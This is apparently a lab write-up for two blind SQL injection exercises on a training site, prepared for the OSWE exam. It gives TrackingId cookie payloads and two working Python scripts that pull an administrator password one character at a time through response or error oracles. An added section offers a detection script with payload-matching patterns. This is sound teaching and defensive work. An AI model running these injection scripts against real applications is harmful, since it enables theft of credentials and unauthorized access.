This topic is explained in detail in the OSWE course, and I assume that it will be tested in the exam.

Lab: Blind SQL injection with conditional responses

Intro

This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.

The results of the SQL query are not returned, and no error messages are displayed. But the application includes a “Welcome back” message in the page if the query returns any rows.

The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.

To solve the lab, log in as the administrator user.

Solution

Trying the traditional injection method to select username and password from the users table produces no output, since query results are never rendered. Start the session in Burp.
In the Burp history it can be seen that the request carries a TrackingId cookie alongside the session cookie:

Cookie: TrackingId=vQKvLxRCijcrlFoo; session=1kmuR4Flcru129GQHmwUqNTKz12AbG2J

It can be verified that TrackingId is vulnerable to SQL injection, because an input like TrackingId=a' or 1=1-- makes the "Welcome back" message appear on the home page. A blind SQL injection is thus possible through conditional responses (whether or not "Welcome back" appears).
We can then manually verify that the administrator account exists in the target database:

Cookie: TrackingId=a'UNION SELECT 'a' from users WHERE username = 'administrator'--; session=Rict9ulgAu63wgQ3vkcsbQ9vfVUPsGBo

After that, we can determine the length of the password for the administrator user:

Cookie: TrackingId=a'UNION SELECT 'a' from users WHERE username = 'administrator' and length(password)=20--; session=Rict9ulgAu63wgQ3vkcsbQ9vfVUPsGBo

This proves that the password is 20 characters long, which means we cannot brute-force it by hand. I developed the following Python code to exploit the blind SQL injection vulnerability character by character.

import requests

def blind_sql_injection(url, length):
    output = ''
    headers = {}
    for i in range(1, length + 1):
        # Compare the ASCII code of the i-th password character with [CHAR];
        # the page shows "Welcome back" only when the comparison is true.
        base_cookie = "TrackingId=a'UNION SELECT 'a' from users WHERE username = 'administrator' and (ascii(substring(password,%s,1)))=[CHAR]--; session=Rict9ulgAu63wgQ3vkcsbQ9vfVUPsGBo" % str(i)
        for j in range(32, 127):  # printable ASCII, '~' (126) included
            print("Currently trying position %s with: " % str(i), chr(j))
            cookie = base_cookie.replace("[CHAR]", str(j))
            headers["cookie"] = cookie
            res = requests.get(url, headers=headers)
            if "Welcome" in res.content.decode('utf-8'):
                output += chr(j)
                break
        print("Current password: ", output)

url = "https://acff1f841e04dc72802261c1003500e8.web-security-academy.net/"
blind_sql_injection(url, 20)

The final password is: futqttlev8verb4m7res

Lab: Blind SQL injection with conditional errors

Intro

This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.

The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows. If the SQL query causes an error, then the application returns a custom error message.

The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.

To solve the lab, log in as the administrator user.

Solution

This lab is similar to the previous one, with the conditional response replaced by conditional errors. I did not know much about conditional-error injection, so I mostly referred to: SQL_Injection_Cheatsheet
Based on the conditional-error payload from the cheat sheet, I built the cookie as:
Cookie: TrackingId=' UNION SELECT CASE WHEN (condition) THEN to_char(1/0) ELSE NULL END FROM users --; session=UWYPqfgrRxE3j6ClT4rgWshux4C54VNs
The division by zero inside to_char(1/0) is only evaluated when the CASE condition is true, so a database error (and the application's custom error page) occurs exactly when the condition holds; that error is the oracle.
With the same technique, we can identify that the administrator user exists in the users table:
Cookie: TrackingId=' UNION SELECT CASE WHEN (username='administrator') THEN to_char(1/0) ELSE NULL END FROM users --; session=UWYPqfgrRxE3j6ClT4rgWshux4C54VNs
Now I can identify the length of the password for the administrator user:
Cookie: TrackingId=' UNION SELECT CASE WHEN (username='administrator' and length(password)=20) THEN to_char(1/0) ELSE NULL END FROM users --; session=UWYPqfgrRxE3j6ClT4rgWshux4C54VNs
As in the previous example, the password length is 20. Let's develop the Python script.

import requests

def blind_sql_injection(url, length):
    output = ''
    headers = {}
    for i in range(1, length + 1):
        # When the i-th password character matches [CHAR], the CASE branch
        # evaluates to_char(1/0), the query errors, and the app answers 500.
        base_cookie = "TrackingId=' UNION SELECT CASE WHEN (username='administrator' and ascii(substr(password,%s,1))= [CHAR]) THEN to_char(1/0) ELSE NULL END FROM users--; session=UWYPqfgrRxE3j6ClT4rgWshux4C54VNs" % str(i)
        for j in range(32, 127):  # printable ASCII, '~' (126) included
            print("Currently trying position %s with: " % str(i), chr(j))
            cookie = base_cookie.replace("[CHAR]", str(j))
            headers["cookie"] = cookie
            res = requests.get(url, headers=headers)
            if res.status_code == 500:
                output += chr(j)
                break
        print("Current password: ", output)

url = "https://ac171f7e1e01e39e80cb0f6f004000f7.web-security-academy.net"
blind_sql_injection(url, 20)

The final password is: tdosf5caziu4dsh5ry1j
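Both labs above leave the same footprint on the server side: a TrackingId cookie that suddenly carries quotes, UNION SELECT or CASE WHEN, and a substring/substr offset that walks from 1 upwards, one request per candidate character. The following detection script is an added example (not part of the lab or the write-up) that parses constructed proxy-style log lines and flags clients whose TrackingId values match either oracle shape; the log format, IPs and session values are assumed.

```python
import re
from collections import defaultdict

# Constructed sample log lines (not from the lab): client IP, HTTP status,
# raw Cookie header. Payload shapes mirror the two write-ups above.
SAMPLE_LOG = """\
10.0.0.5 200 TrackingId=vQKvLxRCijcrlFoo; session=abc
10.0.0.9 200 TrackingId=a'UNION SELECT 'a' from users WHERE username = 'administrator' and (ascii(substring(password,1,1)))=102--; session=abc
10.0.0.9 200 TrackingId=a'UNION SELECT 'a' from users WHERE username = 'administrator' and (ascii(substring(password,2,1)))=117--; session=abc
10.0.0.9 500 TrackingId=' UNION SELECT CASE WHEN (username='administrator' and ascii(substr(password,3,1))= 116) THEN to_char(1/0) ELSE NULL END FROM users--; session=abc
10.0.0.7 200 TrackingId=Zx9QpLmN4; session=def
"""

LINE_RE = re.compile(r"^(?P<ip>\S+) (?P<status>\d{3}) (?P<cookie>.*)$")
TRACKING_RE = re.compile(r"TrackingId=([^;]*)")
# Markers of the conditional-response and conditional-error oracles.
SQLI_MARKERS = re.compile(r"'\s*union\s+select|case\s+when|to_char\(1/0\)|ascii\(subst", re.I)
# Offset being probed, e.g. substring(password,7,1) or substr(password,7,1).
POSITION_RE = re.compile(r"subst(?:ring|r)\(password,(\d+),1\)", re.I)

def parse_line(line):
    """Split one log line into ip, status and the TrackingId cookie value."""
    m = LINE_RE.match(line)
    if not m:
        return None
    t = TRACKING_RE.search(m["cookie"])
    return {"ip": m["ip"], "status": int(m["status"]), "tracking": t.group(1) if t else ""}

def find_probing(log_text):
    """Return, per client IP, how many oracle payloads it sent, which password
    positions it probed, and how many of those requests ended in a 5xx."""
    per_ip = defaultdict(lambda: {"hits": 0, "positions": set(), "errors": 0})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or not SQLI_MARKERS.search(rec["tracking"]):
            continue  # benign analytics cookie
        entry = per_ip[rec["ip"]]
        entry["hits"] += 1
        if rec["status"] >= 500:
            entry["errors"] += 1  # conditional-error oracle leaves 500s behind
        for pos in POSITION_RE.findall(rec["tracking"]):
            entry["positions"].add(int(pos))
    return {ip: {"hits": e["hits"], "positions": sorted(e["positions"]), "errors": e["errors"]}
            for ip, e in per_ip.items()}

if __name__ == "__main__":
    for ip, summary in find_probing(SAMPLE_LOG).items():
        print(ip, summary)
```

A run of increasing positions from one client is the signature of the per-character extraction loop; alerting on it is a detective control only, and the actual fix is to bind the cookie value as a query parameter instead of concatenating it into SQL.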

EndNote

In the original online lab solution, it is suggested to use Burp Intruder to conduct the attack. However, the official OSWE material suggests using Python instead of Burp. For consistency, I use the same coding style as the official OSWE material (with ascii(substring)) to prepare for the exam.